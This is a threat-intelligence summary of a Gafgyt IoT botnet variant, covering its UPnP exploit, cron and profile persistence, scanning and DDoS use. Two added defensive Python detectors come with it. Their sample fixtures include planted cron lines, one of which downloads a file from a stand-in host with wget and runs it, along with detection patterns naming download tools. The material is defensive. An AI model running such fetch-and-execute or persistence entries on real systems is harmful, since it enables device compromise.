EXECUTIVE SUMMARY
The campaign is attributed to an organized cybercrime group that has adapted the Gafgyt IoT botnet for broader impact. These actors exploit vulnerable home and enterprise routers running outdated firmware, focusing on devices that expose UPnP services. Targets span technology firms, manufacturing plants, and any organization with internet‐facing networking equipment, with observed activity originating from Europe and East Asia. Their primary objective is to amass a resilient botnet capable of launching large‐scale denial‐of‐service attacks and providing illicit proxy services for rent.
The infection chain begins with a crafted SSDP request that triggers a buffer overflow in the router's UPnP parser, granting the attacker root privileges. Once inside, the malware copies its binary to hidden directories, sets recurring cron jobs, and modifies shell profiles to guarantee persistence. A separate Python scanner is then downloaded, which probes neighboring IP ranges for vulnerable services, using weak‐credential brute‐force and known web exploits to spread laterally. Compromised hosts establish encrypted links to a central command server, receive instructions, and execute DDoS payloads or additional propagation tasks.
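The persistence step above (binary copied to hidden directories, recurring cron jobs, modified shell profiles) is the part a responder can hunt for on a suspect host. The script below is an added example, not code from the report or from Fortinet: it takes the contents of cron files and shell profiles and flags lines that run something from a hidden or world-writable staging directory, fetch content with a download tool, or re-launch at every boot. The regexes, file paths and sample file contents are constructed for the demonstration and are not known indicators from the campaign.

```python
"""Host-side hunt for the persistence artifacts described above.

Added example (not from the report or from Fortinet): given the contents of
cron files and shell profiles, flag entries that match what the report
describes, a binary staged in a hidden or world-writable directory and
re-launched by a recurring job or a profile line. File paths, regexes and
sample contents are constructed for the demo, not known indicators.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

# A command word that points into /tmp, /var/tmp, /dev/shm or any dot-directory
# (e.g. ~/.cache/.x/bin). Anchored to the start of a command word so PATH exports
# such as PATH=$HOME/.local/bin:$PATH are not flagged.
STAGING_RE = re.compile(
    r"(?:^|[\s;&|(`])"
    r"(?:/(?:tmp|var/tmp|dev/shm)/\S+"
    r"|(?:~|\$HOME|/\S*)?/\.[^\s/]+/\S+)"
)
DOWNLOAD_RE = re.compile(r"\b(?:wget|curl|tftp)\b")
REBOOT_RE = re.compile(r"^@reboot\b")


@dataclass
class Finding:
    source: str      # file the line came from
    line_no: int
    reason: str
    text: str


def suspicious_reasons(line: str) -> list[str]:
    """Return the (possibly empty) list of reasons a line deserves review."""
    reasons = []
    if STAGING_RE.search(line):
        reasons.append("runs a binary from a world-writable or hidden staging directory")
    if DOWNLOAD_RE.search(line):
        reasons.append("fetches content with a download tool")
    if REBOOT_RE.search(line):
        reasons.append("re-launches at every boot")
    return reasons


def scan_file(path: str, content: str) -> list[Finding]:
    findings = []
    for n, raw in enumerate(content.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue                      # blank lines and comments
        reasons = suspicious_reasons(line)
        if reasons:
            findings.append(Finding(path, n, "; ".join(reasons), line))
    return findings


def audit(files: dict[str, str]) -> list[Finding]:
    """Scan a mapping of path -> file contents (collect them however suits the host)."""
    out: list[Finding] = []
    for path, content in files.items():
        out.extend(scan_file(path, content))
    return out


# Constructed sample contents: a stock /etc/crontab, a root crontab with three
# planted entries, a .bashrc with a planted launcher, and a clean /etc/profile.
SAMPLE_FILES = {
    "/etc/crontab": (
        "SHELL=/bin/sh\n"
        "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\n"
        "17 * * * * root cd / && run-parts --report /etc/cron.hourly\n"
    ),
    "/var/spool/cron/crontabs/root": (
        "*/10 * * * * /tmp/.ICE-unix/.x/kworker >/dev/null 2>&1\n"
        "@reboot nohup /var/tmp/.cache/.sys/x &\n"
        "0 3 * * * wget -q http://example.invalid/x -O /tmp/x && sh /tmp/x\n"
    ),
    "/root/.bashrc": (
        "alias ll='ls -la'\n"
        "export PATH=$HOME/.local/bin:$PATH\n"
        "/dev/shm/.s/.net &\n"
    ),
    "/etc/profile": "export EDITOR=vi\n",
}

if __name__ == "__main__":
    for f in audit(SAMPLE_FILES):
        print(f"{f.source}:{f.line_no}: {f.reason}\n    {f.text}")
```

On a real host, feed `audit()` the contents of `/etc/crontab`, `/etc/cron.d/*`, the per-user crontab spool, `/etc/profile`, `/etc/profile.d/*` and each user's `.profile`/`.bashrc`; every hit is a lead to triage, not a verdict, since legitimate software also writes to `/tmp` and dot-directories.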
The threat poses a serious risk because its persistence mechanisms hide in standard system locations and its activity blends with legitimate network traffic, making detection difficult. Its ability to disable competing malware further entrenches the botnet, while the distributed scanning component can quickly expand the infection surface. Organizations should prioritize patching all router firmware, disable unnecessary services such as UPnP and Telnet, and enforce strong, unique credentials for device management. Continuous monitoring of outbound connections, segmentation of IoT assets, and regular backup of critical systems complete a robust defensive posture.
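The monitoring advice above (watch outbound connections, segment IoT assets, remove exposed UPnP and Telnet) maps directly onto three checks over flow records. The script below is an added example, not code from the report or from Fortinet: it parses constructed flow lines and reports SSDP or Telnet reachable from outside the private ranges, one internal host fanning out to many neighbours on service ports the way the scanner does, and an IoT-segment host repeatedly connecting to one external host on a port normal device traffic does not use. The record format, the `10.20.0.0/24` IoT segment, the probe-port set and the thresholds are all assumptions for the demonstration.

```python
"""Network-side triage for the behaviours the report describes.

Added example, not from the report or from Fortinet. Three checks over flow
records: (1) SSDP or Telnet reachable from outside, (2) one internal host
fanning out to many neighbours on service ports, as the scanner does, and
(3) an IoT-segment host repeatedly connecting to one external host on a port
that normal device traffic does not use. The record format, addresses,
segment and thresholds are constructed for the demo.
"""
from __future__ import annotations

import ipaddress
import re
from collections import Counter, defaultdict
from dataclasses import dataclass

INTERNAL_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
IOT_SEGMENT = ipaddress.ip_network("10.20.0.0/24")      # assumed IoT VLAN
EXPOSED_PORTS = {1900: "SSDP/UPnP", 23: "Telnet"}
SCAN_PORTS = {22, 23, 80, 443, 8080, 1900}              # assumed probe set
SCAN_FANOUT = 5                                          # distinct targets before it is a scan
ALLOWED_OUT = {53, 80, 123, 443}                         # ports IoT devices legitimately use
BEACON_COUNT = 3                                         # repeats before it is a beacon

LINE_RE = re.compile(
    r"^(?P<ts>\S+) proto=(?P<proto>\w+) src=(?P<src>[\d.]+):(?P<sport>\d+) "
    r"dst=(?P<dst>[\d.]+):(?P<dport>\d+)$"
)


@dataclass(frozen=True)
class Flow:
    ts: str
    proto: str
    src: ipaddress.IPv4Address
    sport: int
    dst: ipaddress.IPv4Address
    dport: int


def is_internal(ip: ipaddress.IPv4Address) -> bool:
    return any(ip in net for net in INTERNAL_NETS)


def parse(lines: list[str]) -> list[Flow]:
    flows = []
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m:
            continue            # skip malformed records instead of failing the run
        flows.append(Flow(m["ts"], m["proto"],
                          ipaddress.ip_address(m["src"]), int(m["sport"]),
                          ipaddress.ip_address(m["dst"]), int(m["dport"])))
    return flows


def exposed_services(flows: list[Flow]) -> list[str]:
    """Management/discovery ports reached from outside the private ranges."""
    return [f"{EXPOSED_PORTS[f.dport]} on {f.dst} reachable from external host {f.src}"
            for f in flows
            if f.dport in EXPOSED_PORTS and not is_internal(f.src) and is_internal(f.dst)]


def lateral_scans(flows: list[Flow]) -> list[str]:
    """One internal source touching many internal targets on service ports."""
    targets: dict = defaultdict(set)
    for f in flows:
        if is_internal(f.src) and is_internal(f.dst) and f.dport in SCAN_PORTS:
            targets[f.src].add(f.dst)
    return [f"{src} probed {len(t)} internal hosts on service ports"
            for src, t in targets.items() if len(t) >= SCAN_FANOUT]


def iot_beacons(flows: list[Flow]) -> list[str]:
    """IoT-segment host repeatedly reaching one external host:port off the allow-list."""
    counts: Counter = Counter()
    for f in flows:
        if f.src in IOT_SEGMENT and not is_internal(f.dst) and f.dport not in ALLOWED_OUT:
            counts[(f.src, f.dst, f.dport)] += 1
    return [f"{src} connected {n} times to {dst}:{port}"
            for (src, dst, port), n in counts.items() if n >= BEACON_COUNT]


def triage(lines: list[str]) -> dict[str, list[str]]:
    flows = parse(lines)
    return {"exposed": exposed_services(flows),
            "scans": lateral_scans(flows),
            "beacons": iot_beacons(flows)}


# Constructed flow records (documentation address ranges, fabricated timestamps).
SAMPLE_LOG = [
    "2024-05-01T10:00:01Z proto=udp src=203.0.113.7:49152 dst=192.168.1.1:1900",
    "2024-05-01T10:00:02Z proto=tcp src=203.0.113.7:50001 dst=192.168.1.1:23",
    "2024-05-01T10:00:03Z proto=tcp src=192.168.1.50:44000 dst=192.168.1.1:443",
    "2024-05-01T10:01:00Z proto=tcp src=10.20.0.15:40001 dst=10.20.0.2:23",
    "2024-05-01T10:01:01Z proto=tcp src=10.20.0.15:40002 dst=10.20.0.3:23",
    "2024-05-01T10:01:02Z proto=tcp src=10.20.0.15:40003 dst=10.20.0.4:80",
    "2024-05-01T10:01:03Z proto=tcp src=10.20.0.15:40004 dst=10.20.0.5:8080",
    "2024-05-01T10:01:04Z proto=tcp src=10.20.0.15:40005 dst=10.20.0.6:23",
    "2024-05-01T10:01:05Z proto=tcp src=10.20.0.15:40006 dst=10.20.0.7:80",
    "2024-05-01T10:02:00Z proto=tcp src=10.20.0.15:40100 dst=198.51.100.9:9001",
    "2024-05-01T10:02:30Z proto=tcp src=10.20.0.15:40101 dst=198.51.100.9:9001",
    "2024-05-01T10:03:00Z proto=tcp src=10.20.0.15:40102 dst=198.51.100.9:9001",
    "2024-05-01T10:03:05Z proto=udp src=10.20.0.15:5353 dst=198.51.100.53:53",
    "garbled record that should be skipped",
]

if __name__ == "__main__":
    for kind, alerts in triage(SAMPLE_LOG).items():
        for a in alerts:
            print(f"[{kind}] {a}")
```

The beacon check is deliberately strict about the allow-list rather than the destination: the report notes this traffic blends with legitimate activity, so an IoT segment that is only permitted DNS, NTP and HTTP(S) egress gives the check something firm to compare against, which is the practical payoff of the segmentation advice.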
THREAT PROFILE:
| Tactic | Technique ID | Technique | Sub-technique |
|---|---|---|---|
| Command and Control | T1105 | Ingress Tool Transfer | — |
| Initial Access | T1190 | Exploit Public-Facing Application | — |
| Execution | T1059.006 | Command and Scripting Interpreter | Python |
| Persistence | T1053.003 | Scheduled Task/Job | Cron |
| Defense Evasion | T1070.004 | Indicator Removal | File Deletion |
| Credential Access | T1110.001 | Brute Force | Password Guessing |
| Discovery | T1046 | Network Service Discovery | — |
| Lateral Movement | T1210 | Exploitation of Remote Services | — |
| Command and Control | T1095 | Non-Application Layer Protocol | — |
REFERENCES:
The reports contain further technical details:
https://www.fortinet.com/blog/threat-research/inside-cross-platform-propagation-of-new-gafgyt-variant-c0xmo